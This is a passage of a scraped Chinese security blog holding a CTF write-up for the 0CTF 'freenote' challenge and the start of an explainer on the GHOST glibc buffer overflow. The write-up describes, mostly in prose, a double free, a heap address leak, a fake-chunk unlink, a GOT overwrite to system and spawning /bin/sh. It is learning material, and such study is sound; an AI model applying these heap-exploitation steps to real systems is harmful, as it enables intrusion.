margin-top: 0; }
dl dt > :last-child {
margin-bottom: 0; }
dl dd {
margin: 0 0 15px;
padding: 0 15px; }
dl dd > :first-child {
margin-top: 0; }
dl dd > :last-child {
margin-bottom: 0; }
blockquote {
border-left: 4px solid #dddddd;
padding: 0 15px;
color: #777777; }
blockquote > :first-child {
margin-top: 0; }
blockquote > :last-child {
margin-bottom: 0; }
table {
padding: 0;border-collapse: collapse; }
table tr {
border-top: 1px solid #cccccc;
background-color: white;
margin: 0;
padding: 0; }
table tr:nth-child(2n) {
background-color: #f8f8f8; }
table tr th {
font-weight: bold;
border: 1px solid #cccccc;
margin: 0;
padding: 6px 13px; }
table tr td {
border: 1px solid #cccccc;
margin: 0;
padding: 6px 13px; }
table tr th :first-child, table tr td :first-child {
margin-top: 0; }
table tr th :last-child, table tr td :last-child {
margin-bottom: 0; }
img {
max-width: 100%; }
span.frame {
display: block;
overflow: hidden; }
span.frame > span {
border: 1px solid #dddddd;
display: block;
float: left;
overflow: hidden;
margin: 13px 0 0;
padding: 7px;
width: auto; }
span.frame span img {
display: block;
float: left; }
span.frame span span {
clear: both;
color: #333333;
display: block;
padding: 5px 0 0; }
span.align-center {
display: block;
overflow: hidden;
clear: both; }
span.align-center > span {
display: block;
overflow: hidden;
margin: 13px auto 0;
text-align: center; }
span.align-center span img {
margin: 0 auto;
text-align: center; }
span.align-right {
display: block;
overflow: hidden;
clear: both; }
span.align-right > span {
display: block;
overflow: hidden;
margin: 13px 0 0;
text-align: right; }
span.align-right span img {
margin: 0;
text-align: right; }
span.float-left {
display: block;
margin-right: 13px;
overflow: hidden;
float: left; }
span.float-left span {
margin: 13px 0 0; }
span.float-right {
display: block;
margin-left: 13px;
overflow: hidden;
float: right; }
span.float-right > span {
display: block;
overflow: hidden;
margin: 13px auto 0;
text-align: right; }
code, tt {
margin: 0 2px;
padding: 0 5px;
white-space: nowrap;
border: 1px solid #eaeaea;
background-color: #f8f8f8;
border-radius: 3px; }
pre code {
margin: 0;
padding: 0;
white-space: pre;
border: none;
background: transparent; }
.highlight pre {
background-color: #f8f8f8;
border: 1px solid #cccccc;
font-size: 13px;
line-height: 19px;
overflow: auto;
padding: 6px 10px;
border-radius: 3px; }
pre {
background-color: #f8f8f8;
border: 1px solid #cccccc;
font-size: 13px;
line-height: 19px;
overflow: auto;
padding: 6px 10px;
border-radius: 3px; }
pre code, pre tt {
background-color: transparent;
border: none; }
sup {
font-size: 0.83em;
vertical-align: super;
line-height: 0;
}
* {
-webkit-print-color-adjust: exact;
}
@media screen and (min-width: 914px) {
body {
width: 854px;
margin:0 auto;
}
}
@media print {
table, pre {
page-break-inside: avoid;
}
pre {
word-wrap: break-word;
}
}
</style>
</head>
<body>
<h3 id="toc_0">程式概述</h3>
<ul>
<li>freenote 為一個類似筆記功能的程式,這個程式分別有 List , New , Edit , Delete 四個主要的功能及 Exit 結束程式</li>
</ul>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYjij0tM1PgM79t3mhlUFg4LmRzTSeRKVnnp0qM8T-9PQ3PjgqmRIEkkXGkGjVVwGXEYEKrFzsh6YWPeR1-5dP3KW0KloMRTpcRYZnrAerNwvzUgG8uL5QmvU4yzLnfHfJOVLkwvBTbYg/s1600/0ctf1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYjij0tM1PgM79t3mhlUFg4LmRzTSeRKVnnp0qM8T-9PQ3PjgqmRIEkkXGkGjVVwGXEYEKrFzsh6YWPeR1-5dP3KW0KloMRTpcRYZnrAerNwvzUgG8uL5QmvU4yzLnfHfJOVLkwvBTbYg/s320/0ctf1.png" width="320" height="148" /></a></div>
<ul>
<li>會用個 note struct 去紀錄每個筆記<code>是否為有效筆記</code>、<code>筆記大小</code>及<code>指向筆記內容的 pointer</code></li>
</ul>
<pre><code class="language-c">struct note{
int isValidNote; // 0 = not valid, 1 = valid
int length;
char content;
}
</code></pre>
<h3 id="toc_1">程式行為</h3>
<ul>
<li><p>經過 ltrace 分析之後,可發現到一開始程式會先 malloc(0x1810) 用來存放這些 note struct,並以陣列的形式去儲存,其中的 index 即為筆記的編號,在最前方也紀錄共有多少筆記</p>
<ul>
<li>List
<ul>
<li>會列出每個筆記的內容(也就是內容 pointer 所指向的地方),這裏使會列出筆記為<code>isValidNote == 1</code> 的內容</li>
</ul></li>
<li>New
<ul>
<li>再輸入你要的大小之後,如果小於 128 byte 就會分配 128 byte 給你,但如果大於 128 byte 例如 252 byte ,那麼就會給你 128 + 128 byte 的大小,依此類推</li>
</ul></li>
<li>Edit
<ul>
<li>在輸入完要編輯的筆記及大小之後,程式會先判斷這個大小是否與之前的一樣,如果一樣則不會重新分配空間直接編輯內容,如過不一樣則會 realloc 夠你筆記大小的空間給他,不過這部分會先看原先分配空間的後面是否有足夠用的空間給他,如果夠用的話就不會改變起始位置</li>
</ul></li>
<li>Delete
<ul>
<li>輸入完要刪除的筆記後,會將 note[i] 中的 <code>isValidNote</code> 改成 0,在 <code>free(note[i]->content)</code>,並將<code>筆記總數 - 1</code></li>
</ul></li>
</ul></li>
</ul>
<h3 id="toc_2">漏洞</h3>
<ul>
<li><p>Double free</p>
<ul>
<li>在 Delete 時,並不會將筆記從 <code>note[i]</code> 中移除,只是將 <code>isValidNote = 0</code> ,而 free 是根據 <code>note[i]</code> 去決定要 free 哪邊,並沒有先去檢查 <code>note[i]->content</code> 是否已經被 free 掉,一旦輸入同樣的 <code>i</code> 就會造成 double free 的漏洞</li>
</ul></li>
<li><p>Memory leak</p>
<ul>
<li>因在輸入筆記後,程式並沒有在使用者輸入的內容最後方補上 <code>\0</code> ,因此在 <code>free(note[i])</code> 之後,該空間會被加入 <code>free chunk</code> 並有 <code>fd</code> 及 <code>bk</code> 欄位,會指向 heap,當 <code>note[i-1]</code> 使用 <code>edit</code> 加大空間後,可巧妙的接續在 <code>fd</code> 或 <code>bk</code> 之前,而在使用 List 之後便可 leak 出 heap 中上次 free 掉空間的位置,這些位置的 offset 都是固定的,因此可以算出 <code>heap base</code></li>
</ul></li>
</ul>
<h3 id="toc_3">漏洞利用及思路</h3>
<ul>
<li>為了要利用 double free 這個漏洞去改其他位置的值,必須先觸發 <code>unlink()</code> 不過要觸發 <code>unlink()</code> 必須滿足下列三個條件其中一種:
<ul>
<li>如果下一塊是 top chunk,且上一塊是 free chunk
<ul>
<li>最後合併到 top chunk</li>
</ul></li>
<li>如果下一塊不是 top chunk
<ul>
<li>上一塊是 free chunk</li>
<li>下一塊是 free chunk</li>
</ul></li>
</ul></li>
<li>然而紀錄上一塊是不是 free chunk 的及大小資訊( free 是利用這些資訊去尋找上一塊 chunk 位置),會記錄在目前這塊 chunk 的 meta 中,也就是說要確定該快 chunk 是否為已經 free 的狀態是由下一塊的 chunk 所決定的,所以如果使用<code>下一塊是 free chunk</code> 這個條件必須改到下下一塊 chunk 的 meta data 或是利用特殊的方法欺騙 free() 下下一塊的位置,也就是必須動到三塊的 chunk 的 meta data,所以這部分稍微會比較麻煩一點點,故決定採用<code>上一塊是 free chunk</code> 這個條件來達成。</li>
<li>leak heap
<ul>
<li>建立四塊左右的 note,<code>delete 0,2 塊</code>,再利用前面所述的方法,算出 heap 位置</li>
</ul></li>
<li><p>構建 fake chunk</p>
<ul>
<li>先 new 三塊 note 之後,delete 第二塊的,再利用 edit 加大第一塊的空間,使得可以蓋過第二塊的 <code>meta data
</code>起初大概的改法如下</li>
</ul>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi04wDhyphenhyphenCUE37UWZRgwx60MLjOjEJkkT3d0oJaXXNINAPn41Bmh3EQ0MWUWO06fA2gXm4zpu2iPzzc3Y9jidsLyqTdvEXcd3YI3XPuMd2ZJ7FrjEnNFWnUTpUIf9bjnBEg15Wjs3RFQgwg/s1600/0ctf2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi04wDhyphenhyphenCUE37UWZRgwx60MLjOjEJkkT3d0oJaXXNINAPn41Bmh3EQ0MWUWO06fA2gXm4zpu2iPzzc3Y9jidsLyqTdvEXcd3YI3XPuMd2ZJ7FrjEnNFWnUTpUIf9bjnBEg15Wjs3RFQgwg/s320/0ctf2.png" width="320" height="237" /></a></div>
<ul>
<li>但使用後缺發現會一直出現 <code>double linked corruption</code></li>
</ul>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhU8ozRq02E_ab4Vi1AWTI90iS6fRkgdtls7WNriDSQHBCbCJp5Yc-LOGNW7RmVQF_HAKJlNle9b09zm3sWRy68Cv8oCnkHM8q6LXWQi9XOsJ_u0qXGadT6oYULtueZSxRlIE3gRcm9Wfg/s1600/0ctf3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhU8ozRq02E_ab4Vi1AWTI90iS6fRkgdtls7WNriDSQHBCbCJp5Yc-LOGNW7RmVQF_HAKJlNle9b09zm3sWRy68Cv8oCnkHM8q6LXWQi9XOsJ_u0qXGadT6oYULtueZSxRlIE3gRcm9Wfg/s320/0ctf3.png" width="320" height="23" /></a></div>
<ul>
<li>仔細查看後才發現到原來有 <code>FD->bk != P || BK->fd != P</code> 這項保護的機制在,不能直接改,因此必須找到滿足 <code>P->fd->bk == P</code> 及 <code>P->bk->fd == P</code> 的 pointer,才有機會利用</li>
<li><p>過了很久才想到在 note[i] 中都有指向 content 的 pointer 只要稍作修改就可偽造不同 size 的 chunk 讓 free 以為 <code>note[i]->content</code> 所指的位置為 chunk 的 head,這一步應該就是最關鍵的地方,也是讓我卡比較多時間的地方,其最後改法如下圖所示(黃框為 fake chunk ):</p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieghh0W2BUthlKrd_uglBR-bDfg4gCUtja802GVNNL0z6xH7We44S1NcKUOXj4DAT6qSmddqHl_7MyD6EoCaRmXBN_Vl8ubKAR83S4nm3s-1kRjcttk1wWZw6G5hHifnIC5oNLdQswrvU/s1600/0ctf4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieghh0W2BUthlKrd_uglBR-bDfg4gCUtja802GVNNL0z6xH7We44S1NcKUOXj4DAT6qSmddqHl_7MyD6EoCaRmXBN_Vl8ubKAR83S4nm3s-1kRjcttk1wWZw6G5hHifnIC5oNLdQswrvU/s320/0ctf4.png" width="320" height="236" /></a></div></li>
<li><p>在 <code>delete note[1]</code> 也就是 free(note[1]->content) 之後便可成功改到 <code>note[0]</code> 讓 </p>
<ul>
<li><code>note[0]->content = &(note[0]->content)-0x10</code> 亦及 FD->bk = BK</li>
<li><code>note[0]->content = &(note[0]->content)-0x18</code> 亦及 BK->fd = FD</li>
</ul></li>
<li><p>因此 note[0]->content 位置就變成了 <code>&(note[0]->content)-0x18</code> ,這樣就可以利用 edit 任意更改 <code>note[i]</code> 的內容</p></li>
</ul></li>
<li><p>更改 note[i]</p>
<ul>
<li><p>我這邊稍作了修改將 note 變成六塊</p>
<ul>
<li>第 0-1 塊用來 leak heap 位置用</li>
<li>第 2-3 塊用來更改 <code>note[i]</code> 的內容</li>
<li>因此只要再次用 edit 更改同樣大小的內容,便可改掉整個 note,這部分定要跟之前說 new 的大小相同,否則會重新 realloc 會失敗,示意圖大概如下</li>
</ul>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqDlwCyrls_JWYpoJOUbZGugr8ZrcIvEiQRct4wLapSERjP1Xz6fRPrQVBWsdUhY8d7IOiGxUmzqNTsFiJWGdZ89CNBWjgPA4dL34Lnz3FclrL-Pn7D04619jBwjmRSVzNVKVefjy1_iM/s1600/0ctf6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqDlwCyrls_JWYpoJOUbZGugr8ZrcIvEiQRct4wLapSERjP1Xz6fRPrQVBWsdUhY8d7IOiGxUmzqNTsFiJWGdZ89CNBWjgPA4dL34Lnz3FclrL-Pn7D04619jBwjmRSVzNVKVefjy1_iM/s320/0ctf6.png" width="320" height="260" /></a></div>
<ul>
<li>第 4-5 塊最後會用來改 atoi 的 got
<ul>
<li>事實上可以不用這麼多塊,但只是怕亂掉所以每塊都分開</li>
</ul></li>
</ul></li>
<li><p>再來將 <code>note[i]</code> 部分內容改成 <code>free_got</code> 及 <code>atoi_got</code> 位置</p></li>
</ul>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqDlwCyrls_JWYpoJOUbZGugr8ZrcIvEiQRct4wLapSERjP1Xz6fRPrQVBWsdUhY8d7IOiGxUmzqNTsFiJWGdZ89CNBWjgPA4dL34Lnz3FclrL-Pn7D04619jBwjmRSVzNVKVefjy1_iM/s1600/0ctf6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqDlwCyrls_JWYpoJOUbZGugr8ZrcIvEiQRct4wLapSERjP1Xz6fRPrQVBWsdUhY8d7IOiGxUmzqNTsFiJWGdZ89CNBWjgPA4dL34Lnz3FclrL-Pn7D04619jBwjmRSVzNVKVefjy1_iM/s320/0ctf6.png" width="320" height="260" /></a></div>
<ul>
<li>使用 list 後,可利用 got 來算出 libc 的位置</li>
</ul></li>
<li><p>改 got</p>
<ul>
<li>再用 edit 更改 <code>note[5]</code> 後,便可將 atoi 的 got 內容改為 <code>system</code></li>
</ul></li>
<li><p>跳轉到 system</p>
<ul>
<li>直接輸入 <code>/bin/sh</code> 就會去執行 <code>system('/bin/sh')</code>,這樣就拿到 shell 了</li>
</ul></li>
<li><p>exploit
<a href="https://github.com/scwuaptx/CTF/blob/master/0ctf/freenote.py">exploit</a></p></li>
</ul>
<h3 id="toc_4">心得</h3>
<ul>
<li>這次 0ctf 題目算是不會很難,只是不知道為什麼第二天就體力不支了,整整兩天只解了 freenote 這題,不過這次題目出的我個人覺得還算不錯,也挺好玩的,只是實力與經驗還需再加強,也要再多多練一下其他領域的題目,不然每次解 pwn 之外的題目都幾乎不會解,就連最簡單的 SQL injection 都會有點問題,不過我覺得 freenote 這題是很棒的一題,可以拿來練習 heap exploition 的部分,未來有時間再來整理有關 heap exploition 的資料。</li>
</ul>
</body>Angelboyhttp://www.blogger.com/profile/18328929488044413856noreply@blogger.com0tag:blogger.com,1999:blog-8137060704643839542.post-83987973294466295142015-01-28T20:58:00.000-08:002016-10-10T20:59:14.586-07:00GHOST : The Vulnerability of Glibc <style type="text/css">
a {
color: #4183C4; }
a.absent {
color: #cc0000; }
a.anchor {
display: block;
padding-left: 30px;
margin-left: -30px;
cursor: pointer;
position: absolute;
top: 0;
left: 0;
bottom: 0; }
h1, h2, h3, h4, h5, h6 {
margin: 20px 0 10px;
padding: 0;
font-weight: bold;
-webkit-font-smoothing: antialiased;
cursor: text;
position: relative; }
h1:hover a.anchor, h2:hover a.anchor, h3:hover a.anchor, h4:hover a.anchor, h5:hover a.anchor, h6:hover a.anchor {
background: url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAA09pVFh0WE1MOmNvbS5hZG9iZS54bXAAAAAAADw/eHBhY2tldCBiZWdpbj0i77u/IiBpZD0iVzVNME1wQ2VoaUh6cmVTek5UY3prYzlkIj8+IDx4OnhtcG1ldGEgeG1sbnM6eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IkFkb2JlIFhNUCBDb3JlIDUuMy1jMDExIDY2LjE0NTY2MSwgMjAxMi8wMi8wNi0xNDo1NjoyNyAgICAgICAgIj4gPHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIj4gPHJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9IiIgeG1sbnM6eG1wPSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvIiB4bWxuczp4bXBNTT0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wL21tLyIgeG1sbnM6c3RSZWY9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9zVHlwZS9SZXNvdXJjZVJlZiMiIHhtcDpDcmVhdG9yVG9vbD0iQWRvYmUgUGhvdG9zaG9wIENTNiAoMTMuMCAyMDEyMDMwNS5tLjQxNSAyMDEyLzAzLzA1OjIxOjAwOjAwKSAgKE1hY2ludG9zaCkiIHhtcE1NOkluc3RhbmNlSUQ9InhtcC5paWQ6OUM2NjlDQjI4ODBGMTFFMTg1ODlEODNERDJBRjUwQTQiIHhtcE1NOkRvY3VtZW50SUQ9InhtcC5kaWQ6OUM2NjlDQjM4ODBGMTFFMTg1ODlEODNERDJBRjUwQTQiPiA8eG1wTU06RGVyaXZlZEZyb20gc3RSZWY6aW5zdGFuY2VJRD0ieG1wLmlpZDo5QzY2OUNCMDg4MEYxMUUxODU4OUQ4M0REMkFGNTBBNCIgc3RSZWY6ZG9jdW1lbnRJRD0ieG1wLmRpZDo5QzY2OUNCMTg4MEYxMUUxODU4OUQ4M0REMkFGNTBBNCIvPiA8L3JkZjpEZXNjcmlwdGlvbj4gPC9yZGY6UkRGPiA8L3g6eG1wbWV0YT4gPD94cGFja2V0IGVuZD0iciI/PsQhXeAAAABfSURBVHjaYvz//z8DJYCRUgMYQAbAMBQIAvEqkBQWXI6sHqwHiwG70TTBxGaiWwjCTGgOUgJiF1J8wMRAIUA34B4Q76HUBelAfJYSA0CuMIEaRP8wGIkGMA54bgQIMACAmkXJi0hKJQAAAABJRU5ErkJggg==) no-repeat 10px center;
text-decoration: none; }
h1 tt, h1 code {
font-size: inherit; }
h2 tt, h2 code {
font-size: inherit; }
h3 tt, h3 code {
font-size: inherit; }
h4 tt, h4 code {
font-size: inherit; }
h5 tt, h5 code {
font-size: inherit; }
h6 tt, h6 code {
font-size: inherit; }
h1 {
font-size: 28px;
color: black; }
h2 {
font-size: 24px;
border-bottom: 1px solid #cccccc;
color: black; }
h3 {
font-size: 18px; }
h4 {
font-size: 16px; }
h5 {
font-size: 14px; }
h6 {
color: #777777;
font-size: 14px; }
p, blockquote, ul, ol, dl, li, table, pre {
margin: 15px 0; }
hr {
background: transparent url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAYAAAAECAYAAACtBE5DAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAyJpVFh0WE1MOmNvbS5hZG9iZS54bXAAAAAAADw/eHBhY2tldCBiZWdpbj0i77u/IiBpZD0iVzVNME1wQ2VoaUh6cmVTek5UY3prYzlkIj8+IDx4OnhtcG1ldGEgeG1sbnM6eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IkFkb2JlIFhNUCBDb3JlIDUuMC1jMDYwIDYxLjEzNDc3NywgMjAxMC8wMi8xMi0xNzozMjowMCAgICAgICAgIj4gPHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIj4gPHJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9IiIgeG1sbnM6eG1wPSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvIiB4bWxuczp4bXBNTT0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wL21tLyIgeG1sbnM6c3RSZWY9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9zVHlwZS9SZXNvdXJjZVJlZiMiIHhtcDpDcmVhdG9yVG9vbD0iQWRvYmUgUGhvdG9zaG9wIENTNSBNYWNpbnRvc2giIHhtcE1NOkluc3RhbmNlSUQ9InhtcC5paWQ6OENDRjNBN0E2NTZBMTFFMEI3QjRBODM4NzJDMjlGNDgiIHhtcE1NOkRvY3VtZW50SUQ9InhtcC5kaWQ6OENDRjNBN0I2NTZBMTFFMEI3QjRBODM4NzJDMjlGNDgiPiA8eG1wTU06RGVyaXZlZEZyb20gc3RSZWY6aW5zdGFuY2VJRD0ieG1wLmlpZDo4Q0NGM0E3ODY1NkExMUUwQjdCNEE4Mzg3MkMyOUY0OCIgc3RSZWY6ZG9jdW1lbnRJRD0ieG1wLmRpZDo4Q0NGM0E3OTY1NkExMUUwQjdCNEE4Mzg3MkMyOUY0OCIvPiA8L3JkZjpEZXNjcmlwdGlvbj4gPC9yZGY6UkRGPiA8L3g6eG1wbWV0YT4gPD94cGFja2V0IGVuZD0iciI/PqqezsUAAAAfSURBVHjaYmRABcYwBiM2QSA4y4hNEKYDQxAEAAIMAHNGAzhkPOlYAAAAAElFTkSuQmCC) repeat-x 0 0;
border: 0 none;
color: #cccccc;
height: 4px;
padding: 0;
}
body > h2:first-child {
margin-top: 0;
padding-top: 0; }
body > h1:first-child {
margin-top: 0;
padding-top: 0; }
body > h1:first-child + h2 {
margin-top: 0;
padding-top: 0; }
body > h3:first-child, body > h4:first-child, body > h5:first-child, body > h6:first-child {
margin-top: 0;
padding-top: 0; }
a:first-child h1, a:first-child h2, a:first-child h3, a:first-child h4, a:first-child h5, a:first-child h6 {
margin-top: 0;
padding-top: 0; }
h1 p, h2 p, h3 p, h4 p, h5 p, h6 p {
margin-top: 0; }
li p.first {
display: inline-block; }
li {
margin: 0; }
ul, ol {
padding-left: 30px; }
ul :first-child, ol :first-child {
margin-top: 0; }
dl {
padding: 0; }
dl dt {
font-size: 14px;
font-weight: bold;
font-style: italic;
padding: 0;
margin: 15px 0 5px; }
dl dt:first-child {
padding: 0; }
dl dt > :first-child {
margin-top: 0; }
dl dt > :last-child {
margin-bottom: 0; }
dl dd {
margin: 0 0 15px;
padding: 0 15px; }
dl dd > :first-child {
margin-top: 0; }
dl dd > :last-child {
margin-bottom: 0; }
blockquote {
border-left: 4px solid #dddddd;
padding: 0 15px;
color: #777777; }
blockquote > :first-child {
margin-top: 0; }
blockquote > :last-child {
margin-bottom: 0; }
table {
padding: 0;border-collapse: collapse; }
table tr {
border-top: 1px solid #cccccc;
background-color: white;
margin: 0;
padding: 0; }
table tr:nth-child(2n) {
background-color: #f8f8f8; }
table tr th {
font-weight: bold;
border: 1px solid #cccccc;
margin: 0;
padding: 6px 13px; }
table tr td {
border: 1px solid #cccccc;
margin: 0;
padding: 6px 13px; }
table tr th :first-child, table tr td :first-child {
margin-top: 0; }
table tr th :last-child, table tr td :last-child {
margin-bottom: 0; }
img {
max-width: 100%; }
span.frame {
display: block;
overflow: hidden; }
span.frame > span {
border: 1px solid #dddddd;
display: block;
float: left;
overflow: hidden;
margin: 13px 0 0;
padding: 7px;
width: auto; }
span.frame span img {
display: block;
float: left; }
span.frame span span {
clear: both;
color: #333333;
display: block;
padding: 5px 0 0; }
span.align-center {
display: block;
overflow: hidden;
clear: both; }
span.align-center > span {
display: block;
overflow: hidden;
margin: 13px auto 0;
text-align: center; }
span.align-center span img {
margin: 0 auto;
text-align: center; }
span.align-right {
display: block;
overflow: hidden;
clear: both; }
span.align-right > span {
display: block;
overflow: hidden;
margin: 13px 0 0;
text-align: right; }
span.align-right span img {
margin: 0;
text-align: right; }
span.float-left {
display: block;
margin-right: 13px;
overflow: hidden;
float: left; }
span.float-left span {
margin: 13px 0 0; }
span.float-right {
display: block;
margin-left: 13px;
overflow: hidden;
float: right; }
span.float-right > span {
display: block;
overflow: hidden;
margin: 13px auto 0;
text-align: right; }
code, tt {
margin: 0 2px;
padding: 0 5px;
white-space: nowrap;
border: 1px solid #eaeaea;
background-color: #f8f8f8;
border-radius: 3px; }
pre code {
margin: 0;
padding: 0;
white-space: pre;
border: none;
background: transparent; }
.highlight pre {
background-color: #f8f8f8;
border: 1px solid #cccccc;
font-size: 13px;
line-height: 19px;
overflow: auto;
padding: 6px 10px;
border-radius: 3px; }
pre {
background-color: #f8f8f8;
border: 1px solid #cccccc;
font-size: 13px;
line-height: 19px;
overflow: auto;
padding: 6px 10px;
border-radius: 3px; }
pre code, pre tt {
background-color: transparent;
border: none; }
sup {
font-size: 0.83em;
vertical-align: super;
line-height: 0;
}
* {
-webkit-print-color-adjust: exact;
}
@media screen and (min-width: 914px) {
body {
width: 854px;
margin:0 auto;
}
}
@media print {
table, pre {
page-break-inside: avoid;
}
pre {
word-wrap: break-word;
}
}
</style>
</head>
<body>
<h1 id="toc_0">前言</h1>
<p>偶然間在<a href="https://threatpost.com/ghost-glibc-remote-code-execution-vulnerability-affects-all-linux-systems/110679">網路上</a>看到了一個名為 Ghost 的漏洞,所以稍微整理一下,以方便自己理解,背景知識為敘述漏洞時可能需要知道的地方,由於網路上文件頗多,這裡僅挑一些 link 作為參考,便不在此多談。</p>
<h1 id="toc_1">背景知識</h1>
<ul>
<li>vulnerability
<ul>
<li><a href="http://www.csie.ncu.edu.tw/%7Ehsufh/COURSES/FALL2016/2_BOA.ppt">Buffer overflow</a></li>
<li><a href="https://hwchen18546.wordpress.com/2014/05/05/software-heap-overflow/">Heap overflow</a></li>
</ul></li>
<li>protection
<ul>
<li><a href="http://www.csie.ncu.edu.tw/%7Ehsufh/COURSES/FALL2016/2_BOA.ppt">NX (DEP)</a></li>
<li><a href="http://www.csie.ncu.edu.tw/%7Ehsufh/COURSES/FALL2014/2_BOA.ppt">ASLR (Address space layout randomization)</a></li>
<li><a href="http://www.csie.ncu.edu.tw/%7Ehsufh/COURSES/FALL2016/2_BOA.ppt">Stack Guard</a></li>
</ul></li>
<li><a href="http://zh.wikipedia.org/wiki/GNU_C%E5%87%BD%E5%BC%8F%E5%BA%AB">glibc</a></li>
</ul>
<h1 id="toc_2">受影響版本</h1>
<ul>
<li>glibc 2.2 - 2.17</li>
</ul>
<h1 id="toc_3">漏洞概述</h1>
<p>簡單來說在 glibc 中的 <a href="http://osxr.org/glibc/source/nss/digits_dots.c?v=glibc-2.17#0036"><code>__nss_hostname_digits_dots()</code></a> 這個 function 中存在著 buffer overflow 的問題,而會 call 這個 function 的則是 <a href="http://osxr.org/glibc/source/nss/getXXbyYY.c?v=glibc-2.17#0087"><code>gethostbyname*()</code></a> 系列的 function , 這系列 funtion 主要是用來做 IP 和 hostname 的轉換也就是所謂的 DNS Query ,但是當給的 hostname 已經本身就是 IP 的型態呢?為了這種情況 glibc 便在 <code>__nss_hostname_digits_dots()</code> 加了判斷只要是 IP 的型態,便會跳過 DNS 查詢,然而這個地方卻發生了 buffer overflow 的問題,但 payload 必須符合下列條件</p>
<ul>
<li>第一個字元必須是數字</li>
<li>最後一個不能為 dot (.)</li>
<li>全部都必須是數字跟點</li>
<li>需要夠大,足以 overflow</li>
</ul>
<p>然而既然不能塞任意的 <a href="http://en.wikipedia.org/wiki/Shellcode">shellcode</a> ,卻為什麼還是非常危險呢?這裡可能必須先知道 free chunk 是什麼?簡單來說是 glibc 中 malloc 管理分配記憶體的一個機制,會將目前為 free 的空間分成許多 chunk 並用 <strong>linked-list</strong> 串起來,只要 malloc 一個空間,就會從這個 linked-list 拿出來,主要是為了不讓分配的空間支離破碎,而這紀錄這些資訊的地方就是在每個 chunk 中最前面的地方,存有這個 chunk 是不是 inused 或是這個 chunk 大小多大等等資訊,更詳細的內容可參考<a href="http://itlab.idcquan.com/linux/administer/964071.html">這篇</a>,或者是自行 google。</p>
<p>回到主題,為什麼這樣的問題會如此危險?原因是 overflow 之後攻擊者可以利用它去更改 heap 中,鄰近的 <code>free chunk 的 header</code>,以增加 <strong>free chunk</strong> 大小,要是後面又接著程式已使用的空間,那麼當系統在 allocate 給 user 這段空間時,便能任意更改程式所存在記憶體中的資訊,也有機會造成 memory leak 的問題,而且可以繞過 (ASLR,NX) 等保護。</p>
<h1 id="toc_4">漏洞細節</h1>
<p>漏洞發生的 function 為 <a href="http://osxr.org/glibc/source/nss/digits_dots.c?v=glibc-2.17#0036"><code>__nss_hostname_digits_dots()</code></a> 主要在 <strong>hostname</strong> 為 <strong>IP</strong> 時就會使用到這個 function,而這個 function 的 code 中</p>
<pre><code class="language-c">85 size_needed = (sizeof (*host_addr)
86 + sizeof (*h_addr_ptrs) + strlen (name) + 1);
</code></pre>
<p><code>size_needed</code> 會先去計算儲存 <code>host_addr</code>, <code>h_addr_ptrs</code>, 和 <code>name (the hostname)</code> 這三個空間的大小,接下來的 code 主要是確認預先分配的 buffer 是否夠大,要是不夠大則會再分配更大的空間給他,不過分成 <a href="http://zh.wikipedia.org/wiki/%E5%8F%AF%E9%87%8D%E5%85%A5">reentrant</a> 跟 <a href="http://zh.wikipedia.org/wiki/%E5%8F%AF%E9%87%8D%E5%85%A5">non-reentrant</a> 兩種 case ,這裡小提一下什麼 reentrant 跟 non-reentrant 的差別,差別在於主要是可是重複執行及不可重複執行的程式碼,像是遞迴的 code 都是使用 local variable 的,所以基本上重複執行沒問題,但如果 code 使用到的是 static variable 並且是在 multi thread 的情況下,很有可能就會有 <a href="http://en.wikipedia.org/wiki/Race_condition">Race condition</a> 的情況發生,詳細的就不在這裡多說了。</p>
<p>reentrant </p>
<pre><code class="language-c"> 88 if (buffer_size == NULL)
89 {
90 if (buflen < size_needed)
91 {
92 if (h_errnop != NULL)
